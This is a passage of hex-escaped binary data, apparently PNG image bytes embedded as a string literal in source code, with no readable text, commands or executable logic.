\x9e\\xc8\\x33\\xa7\\xe8\\x9b\\xf1\\xae\\x70\\x0e\\xca\\xfb\\x7e\\x1d\\\n\\x9e\\x65\\x5d\\xb4\\x21\\xca\\x61\\x44\\xa0\\xae\\xfa\\xb3\\xe5\\x51\\x64\\xb6\\\n\\x07\\x73\\x6e\\x8a\\x34\\x65\\x5d\\x1a\\x42\\x55\\x1e\\x16\\xea\\x3f\\x5f\\x10\\\n\\x71\\x4e\\x2f\\x17\\xaf\\xe2\\xce\\x65\\x74\\x2d\\xa2\\xf3\\x2e\\x3a\\x1f\\x6b\\\n\\xc4\\x15\\x8e\\x17\\x66\\x55\\x99\\x4a\\xb2\\xd9\\x80\\x56\\x38\\xa7\\xec\\x7b\\\n\\x99\\x54\\x57\\x76\\xdf\\x66\\x8b\\xd9\\x2c\\xec\\x4d\\xfb\\x8b\\xcc\\x7d\\x96\\\n\\xe3\\x92\\x46\\x2c\\xa0\\xa0\\xc1\\x6c\\x25\\xf4\\xe2\\x7e\\x5c\\xb4\\x8a\\x71\\\n\\x77\\x33\\xb7\\x9b\\xce\\x19\\x36\\x48\\xb9\\x54\\x13\\x5d\\xaa\\x09\\xdd\\x96\\\n\\xee\\xfb\\x2a\\xf5\\x74\\x9b\\xe0\\x21\\xf6\\x73\\x92\\x3b\\xb8\\xa3\\x9b\\x4f\\\n\\xe2\\x7b\\x42\\x85\\x95\\x56\\x45\\x9c\\xf2\\xc6\\xe9\\x7c\\xf3\\x04\\x26\\x16\\\n\\x4b\\x55\\x52\\xde\\x0f\\x65\\x84\\xb6\\x4a\\x4b\\x51\\xec\\xdb\\x28\\xf7\\xa9\\\n\\x62\\x7c\\xae\\x21\\xb9\\x9e\\xcb\\x72\\x05\\x05\\x06\\x3b\\xe7\\x9b\\x21\\x8a\\\n\\xd9\\x2e\\xe1\\x94\\x43\\x0a\\x6d\\x2a\\x8e\\xad\\xfc\\xb1\\xec\\x7b\\x43\\x22\\\n\\x4c\\xee\\xa6\\x3b\\xe2\\xb4\\x74\\x98\\x6c\\xee\\x11\\x3b\\x8f\\xe1\\x2f\\x5e\\\n\\xcb\\x76\\x13\\x54\\x8f\\xe7\\xb2\\xbe\\x8f\\x05\\xce\\xf7\\x96\\x20\\xd5\\xfe\\\n\\x8b\\xe0\\xb7\\x37\\x22\\x50\\x13\\xdb\\x91\\x8b\\x8c\\x08\\xaf\\x49\\xc3\\xf8\\\n\\xbb\\x19\\x3f\\xc7\\xf9\\x6b\\xb9\\xf1\\x49\\x5e\\xbc\\x93\\x6d\\x17\\x33\\xee\\\n\\x09\\xe2\\x4e\\xa2\\x89\\xfa\\xbe\\xf0\\xb2\\xc5\\xa2\\x6c\\x51\\x2f\\x9e\\x5b\\\n\\x9c\\x00\\x55\\xe7\\x36\\xbb\\x47\\x5e\\xaa\\xef\\xc4\\x02\\xec\\xc8\\xb8\\x65\\\n\\x1c\\xbe\\x8e\\xfd\\x85\\x05\\xaa\\x59\\x8e\\xd8\\xe1\\xc2\\x0b\\xb8\\xb2\\x87\\\n\\xc5\\x0f\\xb3\\xf7\\x23\\x4c\\x99\\x4a\\xdc\\x48\\x8e\\x5e\\xba\\x40\\x54\\xf5\\\n\\xe1\\x70\\xf7\\x7d\\xf1\\xbe\\xb7\\xe2\\x42\\xd6\\x3d\\xcd\\x8f\\x53\\xfe\\x42\\\n\\x88\\xf2\\x19\\x8e\\x12\\x6c\\x83\\x46\\xc4\\xae\\xdb\\xf0\\xdf\\xc7\\x32\\x77\\\n\\x7a\\xdf\\xfd\\x4d\\x99\\x0d\\x25\\xc7\\x8a\\xc4\\x74\\x30\\x9a\\x82\\x32\\x89\\\n\\xf7\\x12\\x7a\\x6e\\xe6\\x9c\\x84\\xbf\\x48\\x79\\xcc\\xd0\\x8d\\xe1\\x34\\x0d\\\n\\x7e\\x1d\\x1f\\x5b\\x48\\x47\\x67\\xa1\\xcd\\x65\\x63\\xaf\\xd8\\xce\\x98\\xe8\\\n\\xd6\\x90\\x27\\xfa\\x7b\\x86\\xc9\\xf6\\x1e\\xb1\\xe7\\x78\\x3e\\x72\\x30\\x63\\\n\\xc7\\xe8\\x3f\\xae\\x9b\\xf5\\x7d\\x43\\x63\\x90\\x3c\\x1e\\x2a\\x8a\\x9e\\x66\\\n\\x68\\x98\\x98\\x2d\\x82\\x9a\\xd8\\x8e\\x2e\\x24\\x42\\x28\\xdf\\xdd\\xb8\\x18\\\n\\x67\\xaf\\xe7\\x96\\xe5\\x74\\xfd\\x91\\x1d\\xef\\xa3\\x73\\x2d\\xb6\\x23\\x2a\\\n\\x0b\\x50\\x2b\\x9b\\xb0\\x55\\x93\\xb7\\x13\\x54\\xec\\xa3\\x00\\x00\\x20\\x00\\\n\\x49\\x44\\x41\\x54\\x78\\x7e\\xd9\\x75\\xcd\\x24\\xda\\xb2\\x86\\x4f\\xc5\\x2b\\\n\\x88\\x56\\xb3\\xdb\\x33\\x1c\\x9f\\x04\\x8d\\xe6\\xdd\\x5a\\xaf\\x8c\\x56\\x22\\\n\\x48\\xb9\\xbf\\x78\\x9e\\xf1\\x8b\\xd9\\xab\\x97\\xb1\\x33\\x05\\xbb\\x4c\\x99\\\n\\x04\\xdb\\x4c\\xe2\\xcd\\x7e\\x0f\\x47\\xdf\\x67\\x4e\\x50\\x17\\x90\\xdc\\xc0\\\n\\x6
3\\xdd\\x7c\\x5e\\xc8\\x6d\\xdc\\x6a\\x21\\x3d\\x65\\xe8\\x6c\\xe3\\x9f\\x0e\\\n\\xe6\\xe8\\xfd\\x89\\xca\\x54\\xab\\xc5\\x45\\xbb\\x4c\\x12\\xcc\\x9f\\x9b\\x3f\\\n\\xa7\\xec\\x3e\\xcd\\xfa\\xb5\\x17\\xe7\\xd0\\x75\\x27\\xdf\\x4b\\xf9\\x2b\\xa1\\\n\\x0f\\x87\\x94\\x18\\x44\\xc1\\xfc\\x74\\xfc\\x74\\xa6\\xed\\x24\\xd4\\xe0\\x2d\\\n\\x12\\xdc\\x62\\xbb\\xf2\\x63\\x64\\x2c\\x7e\\x1b\\x88\\xed\\xd9\\x02\\x33\\xbb\\\n\\xa5\\x89\\x55\\x8c\\x37\\x6d\\xcf\\x89\\xaf\\x25\\xca\\xb7\\x2f\\x6b\\x6f\\x7e\\\n\\x4b\\xdf\\xbe\\x5f\\x89\\x2b\\x58\\xdb\\x1d\\x12\\x82\\xdc\\xbd\\x85\\xda\\x3c\\\n\\x24\\xa8\\x89\\xed\\xe8\\x45\\x2a\\x70\\xae\\x77\\x0b\\x49\\xce\\xcf\\x5e\\xcd\\\n\\x83\\x4b\\x99\\x72\\x1b\\x93\\x1e\\xa7\\x7d\\x3c\\xd1\\x24\\x1b\\x42\\x8a\\x8a\\\n\\xa8\\x92\\xa2\\xf2\\xdf\\x8b\\x13\\xbc\\x4a\\x95\\x55\\xc6\\xbd\\x16\\xff\\x2b\\\n\\x15\\x88\\xd5\\x02\\xa2\\x29\\x41\\xca\\x7d\\x73\\x57\\x70\\xe6\\xb8\\x5d\\xf0\\\n\\x3c\\x6c\\x25\\x2e\\x36\\xd5\\x90\\x72\\x7b\\xb9\\xf3\\x21\\x5e\\xb1\\x94\\xc9\\\n\\xd3\\x1b\\x52\\x6e\\xde\\x56\\x50\\x5c\\x4c\\xca\\x08\\x63\\xd9\\x22\\x99\\xdf\\\n\\x96\\x7d\\xdf\\xd8\\xbe\\xcf\\xd0\\x26\\xa8\\x0f\\xce\\xa2\\x67\\x19\\xbf\\x12\\\n\\x62\\x67\\xaf\\xd2\\xa2\\x4e\\x50\\x05\\xc4\\x38\\x69\\x0e\\x9f\\x3f\\x3a\\x58\\\n\\x4a\\x50\\xde\\x97\\x45\\x34\\x23\\x4e\\xc5\\xf3\\x06\\x33\\xe0\\x22\\x81\\x1b\\\n\\x3c\\x9d\\xae\\x87\\xf9\\xc7\\x88\\x7f\\x48\\x43\\x04\\xdf\\xe6\\x40\\x6f\\xc4\\\n\\x6e\\xdd\\x1c\\xfa\\x2a\\xfd\\xb3\\x88\\x15\\xdb\\x55\\x64\\x2a\\x3a\\x70\\x0b\\\n\\x69\\x37\\xd7\\xa6\\x2c\\x2e\\xb9\\x6c\\x73\\x23\\x8a\\xf8\\xc0\\x2c\\x5e\\xb3\\\n\\x30\\xc7\\x20\\xf5\\x3b\\x49\\xff\\x86\\xc5\\xb8\\x22\\xc4\\xbe\\x5f\\x2b\\xa4\\\n\\x07\\xed\\x2e\\x5e\\xd7\\xca\\xa8\\x89\\xed\\xd6\\x81\\x8c\\x30\\xdc\\x8c\\x1f\\\n\\xa5\\x5c\\xbd\\x82\\xf4\\x8f\\xec\\x72\\x2f\\x63\\x63\\xe2\\xa9\\x9a\\xdb\\x1e\\\n\\xb3\\x7d\\x55\\x2a\\xcf\\xaa\\x7d\\xc5\\xeb\\x07\\xda\\x17\\x09\\x62\\xe3\\x8e\\\n\\x02\\xd1\\x5d\\xc1\\x5e\\xcf\\x72\\xb4\\x60\\xa7\\xce\\x8a\\x1c\\xb4\\x12\\x32\\\n\\x29\\xf7\\x82\\x55\\x6c\\xbb\\x88\\xf9\\xbd\\x8c\\x99\\x6d\\x60\\x69\\xb3\\x4a\\\n\\x8d\\xbc\\x39\\xfb\\x3e\\xbb\\x47\\x82\\xab\\x48\\x2e\\x63\\xed\\x3a\\xfe\\xb7\\\n\\x60\\x9f\\x7d\\x42\\x6b\\x31\\x34\\xcd\\xb0\\xf7\\x44\\xbe\\xf7\\x2e\\xa6\\x8c\\\n\\xd3\\xbc\\x5f\\x8a\\x7d\\x54\\xf6\\x5e\\xaa\\xde\\x55\\xd5\\x7d\\xb2\\xe3\\xb1\\\n\\x20\\x6d\\x9d\\x16\\xd4\\xef\\x9f\\x8e\\xf8\\xf7\\x74\\xf3\\x32\\x2b\\x29\\x9e\\\n\\x7a\\x8e\\x93\\xf7\\xa1\\x2d\\xd3\\x50\\x55\\xb5\\xaf\\x78\\xac\\x1d\\x4b\\x88\\\n\\x9e\\x0d\\x69\\x36\\xaf\\xb5\\xe5\\xdf\\xf7\\x18\\x7c\\xe6\\x95\\xec\\x9e\\x65\\\n\\x41\\x1b\\xa8\\xef\\x09\\xfd\\xfc\\x20\\xae\\xe1\\x99\\x24\\x98\\x38\\x1e\\xd8\\\n\\x72\\x4d\\x1e\\x1a\\xd4\\xc4\\x76\\xeb\\x41\\x36\\xa9\\x7a\\xb1\\x4c\\x50\\x33\\\n\\xff\\xf4\\x45\\x9e\\xb9\\x97\\xd9\\xb7\\x31\\x69\\x3d\\xd1\\x4c\\x81\\xfb\\xcd\\\n\\x1b\\xea\\xca\\x24\\xa6\\x32\\x55\\x69\\x19\\xa1\\xae\\xe2\\xb6\\xab\\xbe\\x17\\\n\\xb9\\xf0\\x7d\\xc3\\xbe\\xed\\x97\\x71\\x6c\\x12\\x12\\x28\\xdd\\xac\\xf5\\x92\\\n\\x29\\x64\\xcc\\xcc\\x15\\x09\\xb7\\x3e\\xc4\\x41\\xf7\\x32\\x69\\x57\\xa2\\xed\\\n\\xf4\\xef\\xcb\\x66\\xfd\\x48\\xff\\x7e\\x2d\\x1e\\xdb\\xd8\\xbe\\x27\\x2c\\xb6\\\n\\x4f\\xe2\\x47\\x24\\xf7\\x06\\x47\\xb4\\x77\\xe2\\x27\\x46\\x86\\x34\\x9b\\xa1\\\n\\x03\\xdf\\x39\\x8a\\x03\\x76\\x17\\x54\\xa9\\x45\\xe4\\xfb\\xa9\\xca\\x61\\xa8\\\n\\xac\\x7f\\x95\\x5c\\x53\\x65\\xf7\\x6e\\xc3\\x63\\x24\\x67\\xf0\\xdc\\xf3\\x7c\\\n\\x40\\x88\\x1b\\xdf\\x12\\xcc\\xe0\\xd3\\x98\\xff\\x0c\\xf3\\x5f\\x59\\xf2\\xfc\\\n\\x65\\x73\\x29\\xff\\x1c\\xcf\
\xe0\\x21\\x56\\xc6\\x9c\\xbf\\x99\\x19\\x83\\x22\\\n\\xe2\\x88\\xe9\\x11\\x9f\\x3e\\x98\\xc9\\x93\\x1a\\x3b\\x07\\xd3\\xf7\\xdd\\x38\\\n\\x97\\x64\\x15\\xff\\x85\\xd3\\x95\\x0f\\xef\\x96\\x46\\x4d\\x6c\\xb7\\x6e\\xac\\\n\\x12\\xca\\xa2\\x7d\\xbf\\x9b\\x3b\\x1e\\x66\\x97\\x9b\\x98\\xf1\\x62\\x83\\xe8\\\n\\x8e\\xd3\\xb7\\x56\\x6a\\x71\\xf2\\xe6\\xbf\\x37\\xb3\\x4d\\xe6\\x3f\\xcd\\x88\\\n\\x6b\\x51\\xf2\\xc8\\x54\\xb1\\x73\\xb0\\x1b\\x63\\x1e\\xe0\\x90\\xf5\\x1c\\x22\\\n\\xa8\\x3c\\x5b\\xd1\\x43\\x36\\x11\\x18\\xf0\\x33\\x57\\x33\\xe1\\x56\\xf6\\xeb\\\n\\xa1\\x6d\\xae\\xfe\\x6a\\xe4\\x32\\x29\\xb6\\x99\\x74\\xba\\xa9\\x7d\\x4f\\x90\\\n\\x0e\\xae\\xc3\\x79\\xac\\x5b\\x1d\\x0a\\x44\\x9c\\x24\\x68\\x0b\\x46\\x1a\\x4e\\\n\\xd9\\x9b\\xbf\\x3c\\x22\\x84\\xfc\\xf4\\x63\\x3c\\x9a\\x8d\\xa9\\x62\\xdf\\x97\\\n\\x69\\x15\\x9a\\xa9\\xe1\\x33\\xb4\\x09\\x3a\\xd8\\x9f\\xb1\\x74\\x2d\\xc7\\x0b\\\n\\x0e\\x3b\\x5b\\x8a\\x00\\xa4\\xb8\\xe5\\x39\\x3e\\x34\\x95\\xce\\x1d\\x4b\\xda\\\n\\x59\\x35\\x46\\x12\\x61\\x4e\\xdf\\x15\\x7e\\x9e\\x99\\x6e\\xd9\\x9a\\xc3\\x69\\\n\\xc4\\x7e\\x13\\x38\\xe5\\x30\\x3a\\xca\\x9c\\xa3\\xca\\xfa\\xbe\\x5d\\x18\\xb7\\\n\\x77\\xf2\\x7b\\x9c\\x6a\\x04\\x79\\x20\\xe7\\x51\\x13\\xdb\\x1a\\x6c\\x70\\x44\\\n\\x3a\\x33\\xe1\\xe6\\xc7\\x98\\xfe\\x3b\\x76\\x7d\\x8e\\x68\\x86\\x10\\x3e\\xf4\\\n\\x72\\x5c\\x52\\xcb\\xa4\\x85\\x4d\\x41\\x22\\x24\\xed\\x78\\x25\\xd1\\xd3\\xcc\\\n\\x7a\\x86\\x63\\x85\\x72\\x7e\\x8f\\x0e\\xe1\\xdf\\x0c\\x15\\x52\\xc1\\xe7\\xe8\\\n\\x2a\\xdc\\xf0\\x30\\x07\\x2e\\x66\\xca\\xae\\x42\\x2a\\xb1\\xc1\\xf6\\x63\\x99\\\n\\x64\\x36\\xd8\\xeb\\xb2\\x46\\x64\\x68\\x13\\x54\\x9d\\x3f\\xc3\\x1f\\x42\\x2d\\\n\\xd3\\x53\\x84\\xcc\\x5d\\xad\\x16\\x5e\\x35\\x18\\xcc\\x9b\\xc0\\x0f\\xde\\xcb\\\n\\x76\\x65\\x21\\x6d\\x83\\xb1\\xd7\\x56\\x9d\\x53\\x64\\x00\\xab\\xce\\x6d\\xc3\\\n\\x8d\\xb8\\x98\\xdb\\x13\\x8e\\x4f\\x43\\x21\\xa6\\x2d\\x3d\\x0e\\x5f\\x40\\xd7\\\n\\x32\\xde\\xf4\\x4a\\xe2\\xaa\\x85\\xbc\\xf8\\x0c\\xa9\\xa0\\x16\\xb8\\x95\\xf1\\\n\\x3d\\x21\\xd5\\xf5\\x96\\x74\\x84\\x8b\\x23\\xde\\xb9\\x23\\xc7\\xbc\\xa6\\x70\\\n\\xa0\\x59\\xdf\\xaf\\xc2\\xc5\\x74\\x75\\xf1\\x59\\xfc\\x6e\\xcb\\x34\\x75\\xe8\\\n\\x51\\x13\\xdb\\x1a\\x19\\x52\\x81\\xe9\\x5d\\x22\\x84\\x2d\\xfc\\xfa\\x89\\xe0\\\n\\x4c\\xb5\\xdb\\x2a\\xe2\\x19\\x82\\x0e\\xb7\\x2c\\x47\\x70\\x19\\xaa\\x6c\\x47\\\n\\x54\\x5f\\xdf\\xec\\x78\\xe6\\x3c\\xb5\\x0f\\x51\\xc2\\xe4\\x47\\x83\\x34\\xb1\\\n\\x52\\x88\\x58\\x69\\x45\\x24\\x78\\x08\\x67\\xbf\\xc8\\x36\\x7f\\x64\\x61\\x0f\\\n\\xed\\xbb\\xda\\xe0\\x90\\x56\\x25\\x89\\x54\\xa1\\x4c\\xc2\\x1a\\xe8\\xbc\\x76\\\n\\xc1\\xbb\\xec\\xe7\\x74\\x3d\\xcd\\x39\\x69\\x90\\x66\\x6f\\xd1\\x7a\\xb6\\xef\\\n\\x01\\x31\\x9e\\x8e\\x6e\\x7e\\x70\\x34\\xfb\\xce\\xaa\\x50\\x1f\\x0f\\x84\\x81\\\n\\x34\\x0a\\x83\\xb9\\xfe\\x6a\\x92\\x5f\\x73\\x55\\xc2\\x49\\x69\\xb0\\x1d\\x0e\\\n\\x07\\xc3\\x97\\xe2\\x8f\\xeb\\x79\\x53\\x17\\xbb\\xec\\x59\\xd1\\x88\\x32\\x6d\\\n\\xc7\\x38\\xdc\\x4c\\xdc\\x15\\x42\\xbb\\xb6\\xa4\\x93\\x54\\x84\\xbf\\x79\\x05\\\n\\x73\\xe7\\x86\\x79\\x3c\\x60\\xdf\\x8f\\x11\\x54\\x6f\\x4b\\x42\\x8e\\x90\\xff\\\n\\x23\\x14\\x18\\x1b\\x91\\xa8\\x89\\x6d\\x8d\\x22\\x52\\x41\\xd2\\x7d\\x08\\xe7\\\n\\xf7\\x72\\xc3\\x63\\xcc\\x5c\\xc4\\xcc\\x75\\x8d\\xd4\\x90\\x1d\\xfa\\x12\\x8b\\\n\\x32\\x55\\x5d\\x1e\\x03\\x11\\x95\\xaa\\x7b\\x94\\xa9\\xa0\\x23\\x41\\xad\\x3c\\\n\\x99\\xce\\xa5\\x1c\\xd1\\x13\\x4a\\x8e\\xdd\\xa8\\x35\\x27\\x61\\x2a\\x78\\xa5\\\n\\xfe\\x32\\xe1\\xf6\\x87\\x59\\xb8\\x84\\x29\\xd3\\x89\\xb6\\xb7\\x81\\x71\\xa9\\\n\\x62\\x48\\x9a\\xa9\\x05\\x9b\\xf5\\x7d\\x66\\x4f\\x5c\\x
8b\\x0b\\xf1\\x5b\\x1e\\\n\\x5f\\x1f\\x42\\x7a\\xbe\\x2a\\xd8\\xfb\\x5a\\x4d\\x1b\\x30\\x18\\xc4\\x3d\\x7c\\\n\\x60\\x2f\\x3e\\xf9\\x26\\xda\\xab\\x1c\\x6b\\x9a\\x8d\\x23\\xb9\\x7d\\xf9\\xf1\\\n\\x5b\\xe6\\xd1\\x5d\\x36\\xfe\\x7a\\x05\\x09\\xeb\\x36\\xce\\xea\\xe5\\x13\\x82\\\n\\xef\\xc3\\x70\\xa2\\x1b\\x0f\\x3d\\xc5\\x09\\xf3\\xe8\\x18\\x6f\\x70\\x7d\\xd1\\\n\\x8e\\x65\\x44\\x4f\\x05\\xf3\\xfd\\x65\\xb6\\xcc\\x78\\x88\\x63\\x66\\x47\\xfc\\\n\\xed\\x1b\\x99\\x94\\x8f\\x4b\\xcf\\x50\\xa6\\xb6\\xef\\xc2\\xa5\\xf4\\xac\\xe5\\\n\\xcb\\x82\\xbf\\xc6\\x88\\x45\\x4d\\x6c\\x6b\\x54\\x21\\x23\\xba\\x0f\\xe2\\xbc\\\n\\x2e\\x16\\x3d\\xc2\\x2e\\x8b\\x99\\x9e\\x10\\x4f\\xd7\\x3f\\xa6\\x34\\xc3\\x40\\\n\\xaa\\xba\\xfc\\xb6\\xec\\x78\\x95\\xa3\\x50\\x76\\x2c\\x15\\x52\\x52\\xce\\xa1\\\n\\xfd\\x01\\x0e\\x58\\xc7\\x2b\\x04\\xb3\\x4e\\xab\\xda\\x72\\x7a\\x05\\x8d\\xc1\\\n\\x2f\\x5e\\x60\\xec\\x5d\\xcc\\xef\\x6e\\xe4\\xb6\\x6e\\x53\\x2d\\x91\\x34\\x73\\\n\\x1c\\x69\\x86\\x76\\xc1\\x3d\\xfa\\x67\\x24\\x0f\\x73\\x55\\x1a\\x8a\\xbb\\x5f\\\n\\xae\\xf5\\xe2\\x95\\x07\\x8d\\x98\\x9d\\xc6\\xf2\\xe3\\xf7\\xb2\\x7d\\xbe\\x52\\\n\\x4c\\x51\\xdd\\x5e\\xc5\\xcc\\x95\\x2d\\xea\\xf9\\xef\\x55\\x4c\\x4b\\xe3\\xbf\\\n\\xad\\xc1\\xcf\\x59\\x73\\x37\\xff\\x2f\\xe1\\x7f\\x69\\x9d\\x38\\xe4\\x47\\x13\\\n\\xf6\\xef\\x66\\xef\\xbd\\x0d\\x4e\\xa5\\x9e\\xd9\\x39\\xee\\x0b\\x36\\xd4\\x9f\\\n\\xdb\\x32\\xe6\\x84\\x14\\x47\\xed\\xc0\\x49\\x87\\xd1\\x16\\x1b\\xb8\\xef\\x63\\\n\\xdc\\x8b\\xdb\\xb9\\x4f\\xf0\\x98\\x5f\\xb5\\x05\\xda\\xb9\\xd9\\x50\\x13\\xdb\\\n\\x1a\\x03\\x21\\x15\\xa4\\xc6\\xc5\\xb8\\x70\\x1d\\x0f\\x2c\\x65\\xf6\\xfd\\x4c\\\n\\x1d\\x47\\x34\\x35\\x77\\x62\\xb3\\xc9\\x93\\x6d\\x07\\xf2\\x10\\xcd\\xb6\\x55\\\n\\x36\\x9c\\x3c\\x01\\x9e\\x88\\x7d\\x88\\x1f\\x61\\xaf\\xd5\\xbc\\x46\\x90\\x70\\\n\\x5b\\x65\\x11\\x2c\\x22\\x15\\x16\\x8b\\x5f\\xf5\\x70\\xc7\\x23\\xcc\\x5b\\xca\\\n\\xb4\\x69\\x42\\xac\\xf3\\xcb\\x25\\x06\\xd9\\x0d\\xf3\\xbf\\x63\\x81\\xaa\\x5f\\\n\\x81\\xab\\x59\\xb9\\x3a\\x48\\xb2\\xff\\x4b\\x50\\x75\\x8e\\x38\\xb5\\x71\\x86\\\n\\x28\\x48\\xb2\\xff\\xfe\\x26\\x0e\\x9d\\xab\\x7f\\x22\\x87\\x32\\x02\\xd9\\x4c\\\n\\xe5\\x5e\\x26\\xf9\\x15\\x09\\x76\\xb6\\x8d\\x85\\x00\\xef\\x9f\\xb1\\xea\\x11\\\n\\xbe\\x9c\\x84\\xca\\x47\\xad\\xc4\\xd4\\x25\\x58\\xb5\\x8a\\xe3\\x16\\x34\\xb2\\\n\\x4a\\xd1\\x9c\\xa9\\x4d\\x05\\x3f\\x8c\\x3f\\xb2\\x5d\\x37\\x17\\x08\\x21\\x5f\\\n\\x9b\\x1b\\x31\\xfe\\x61\\x3e\\xfb\\xec\\x93\\x7b\\x87\\xcd\\xfa\\xbe\\x5d\\xc8\\\n\\xd1\\xfd\\x24\\xe7\\x09\\x49\\x38\\x46\\xec\\x18\\xa6\\x26\\xb6\\x35\\x5e\\x1e\\\n\\xd6\\xe0\\xf6\\x94\\x4b\\x57\\xf3\\xfc\\xbd\\xcc\\x7d\\x9c\\x89\\x53\\x04\\x07\\\n\\xa6\\x7c\\x06\\x9f\\x66\\x04\\x56\\xe1\\x58\\xd5\\x79\\x65\\xaa\\xd3\\x3c\\x52\\\n\\x21\\x23\\xce\\x02\\xac\\x08\\x8e\\x53\\x87\\x09\\xa5\\x57\\x1f\\x2b\\xf9\\xbb\\\n\\x56\\x41\\x0f\\xee\\x49\\xb9\\x62\\x15\\x63\\xee\\x66\\x5e\\x0f\\x63\\x77\\xd6\\\n\\x5f\\x53\\x30\\x50\\xdf\\xe5\\xd1\\x26\\xe8\\x04\\x7f\\x16\\x72\\xdf\\xde\\xd6\\\n\\x1b\\xca\\xb9\\xfd\\x48\\x8b\\x96\\xc3\\x7b\\x19\\x88\\x63\\xde\\xbc\\x13\\x5f\\\n\\x3d\\xae\\xe0\\x7d\\x4c\\x39\\x31\\xa9\\x1a\\x37\\xcd\\x08\\x50\\xd9\\xb8\\xcb\\\n\\x0a\\xbe\\x9f\\xc3\\x8a\\xe5\\xfc\\xb5\\x90\\xe2\\xb0\\x15\\xb5\\x03\\x8f\\x77\\\n\\x73\\xf4\\x76\\xec\\x34\\xab\\x84\\x90\\xc9\\xfd\\xce\\x9e\\x6d\\x3c\\x16\\xd3\\\n\\xfe\\x42\\x60\\xc4\\x6e\\xb2\\x79\\xe7\\x4b\\x1c\\x31\\x27\\xe6\\x1f\\x8e\\x62\\\n\\xe2\\x76\\x85\\x83\\x65\\xed\\xcc\\xd4\\x6a\\x57\\xd1\\xb3\\x3e\\xd8\\x6a\\x47\\\n\\x54\\xb6\\xa8\\x32\\xd4\\xc4\\xb6\\xc6\\xc6\\xe0\\x79\\xfc\\x36\\xe5\\x97\\x2b\\\n\
\x42\\xe1\\x83\\xd9\\xab\\xe8\\xdc\\xc9\\x06\\x27\\xaa\\x3c\\x8a\\x36\\xb2\\xb2\\\n\\x85\\xa0\\x8a\\xc0\\x56\\xa9\\x06\\xf3\\xc7\\xdb\\xb1\\x37\\xd6\\x32\\x75\\x39\\\n\\x47\\xa4\\xc1\\xde\\xfc\\xa0\\xd6\\xce\\xeb\\xbb\\x52\\x90\\x72\\xef\\x7a\\x98\\\n\\xbd\\x1e\\xce\\x49\\xb9\\xcd\\xd8\\xf7\\x22\\xd3\\x91\\x7d\\xff\\x1d\\x2e\\x64\\\n\\xcd\\xb3\\x21\\x06\\xf1\\x63\\x02\\xd3\\xd1\\xca\\xcf\\x3f\\x28\\xb4\\xb1\\x7d\\\n\\xcc\\x99\\xef\\x61\\xc6\\x84\\xc2\\xb1\\x66\\x2a\\xe4\\xc1\\x98\\x32\\x34\\x39\\\n\\xa7\\x0d\\xf7\\x93\\x9c\\xc7\\xa3\\xcf\\xf2\\xd1\\x98\\x9f\\xa7\\xad\\x9b\\xb1\\\n\\xa8\\x17\\x53\\x13\\x0e\\x7f\\x45\\xe3\\xf1\\x06\\x32\\x35\\x34\\x54\\xe3\\xd1\\\n\\xd2\\xe0\\x82\\x71\\x81\\xcd\\xcb\\x44\\x44\\x11\\xef\\x9d\\xce\\x09\\x87\\x35\\\n\\x4a\\x04\\x0e\\xe6\\xfd\\x2c\\xc7\\xad\\x3c\\x9e\\xf2\\xcf\\xc2\\x7c\\x19\\xd1\\\n\\xa8\\x89\\x6d\\x8d\\x8d\\x45\\x22\\xcc\\x87\\xcb\\x7a\\xb8\\xfd\\x31\\x66\\xdd\\\n\\xcd\\x4e\\x9d\\xb4\\xed\\x68\\xf0\\xd2\\x44\\xb6\\x2d\\x7e\\xaf\\x22\\xba\\x55\\\n\\x5c\\x3b\\xec\\x19\\xbe\\x4e\\x7a\\x8c\\x23\\x93\\x10\\xbb\\x7f\\x87\\xd6\\x26\\\n\\x38\\x3d\\x82\\x59\\xea\\xf2\\xe7\\xd9\\xe6\\x2e\\xe6\\x25\\x25\\xb6\\xdc\\x32\\\n\\xe9\\x2c\\xb3\\x69\\x3d\\x8f\\x5f\\x90\\xfc\\x8e\\x87\\xbb\\x43\\x3e\\xde\\x6f\\\n\\x08\\x0b\\x53\\xab\\x4a\\xf6\\x83\\x46\\x7b\\x50\\x1f\\x9f\\xba\\x1f\\xef\\x3d\\\n\\x90\\xa8\\x58\\x0c\\xbe\\x4a\\x85\\x5c\\x76\\x4e\\x59\\x1f\\x2a\\x9c\\x93\\xa1\\\n\\x0d\\xbf\\x27\\xb9\\x88\\xbb\\x56\\x87\\x64\\x15\\xd7\\xa6\\xad\\x3d\\x8e\\xd2\\\n\\x88\\xee\\xb5\\x9c\\xb0\\x0f\\xdb\\x54\\xa9\\x92\\xf3\\xcf\\x99\\x60\\x5b\\xdc\\\n\\xc1\\x94\\x9e\\xe0\\x24\\xb5\\x39\\x9d\\xbd\\xc6\\xe0\\x6b\\x07\\x32\\x2b\\x4b\\\n\\x42\\x52\\xf5\\x0e\\xb3\\x6d\\x16\\xc7\\x7c\\x1f\\xb7\\x46\\xfc\\x40\\xeb\\x25\\\n\\xb2\\x79\\xd9\\xa8\\x89\\x6d\\x8d\\x4d\\x45\\xe6\\xfc\\x73\\xde\\x3a\\x9e\\xbc\\\n\\x87\\x05\\x8f\\xb1\\xdd\\xce\\x82\\xaa\\x8a\\xe6\\xaa\\x62\\x4d\\x7e\\x0f\\x86\\\n\\x60\\xe7\\x91\\x0a\\x9e\\xca\\xe3\\xd9\\xe6\\x51\\xde\\xd8\\x1d\\xd6\\x94\\xdb\\\n\\xb4\\xae\\x44\\x42\\x68\\xf6\\x4a\\x5c\\xd5\\xcb\\x5d\\x4b\\xd9\\xe7\\x01\\xa6\\\n\\xcc\\x14\\xaa\\x34\\x65\\x27\\x94\\xa9\\x46\\xef\\xc1\\xb9\\x21\\xd6\\xf2\\x72\\\n\\xfc\\x19\\xae\\xd1\\xda\\x44\\xe1\\xe5\\x62\\xde\\x38\\xbe\\xfd\\xde\\x50\\x18\\\n\\x7e\\x50\\xe3\\xa0\\x4a\\xc5\\xdc\\xcc\\xfe\\x5f\\xb4\\xd1\\x5e\\x8f\\xcb\\xb8\\\n\\xb1\\x97\\xf7\\xa4\\x41\\x43\\x30\\x12\\x18\\x97\\x55\\x3d\\xbc\\x73\\x26\\x3b\\\n\\x4e\\x2f\\x1c\\xa8\\xea\\xb7\\x09\\x58\\x42\\xc7\\xca\\x50\\xb6\\xf3\\x1a\\x9b\\\n\\xe9\\x39\\x23\\x5e\\x3d\\x86\\xbf\\x3e\\x86\\xce\\xb1\\x1b\\xf6\\xbd\\xb4\\x2d\\\n\\x9b\\xfb\\x63\\x84\\x58\\x9f\\x67\\x82\\x46\\x61\\x4b\\x79\\x4c\\x6f\\x56\\xd4\\\n\\xc4\\xb6\\xc6\\x50\\x61\\xbd\\x10\\xf3\\x7a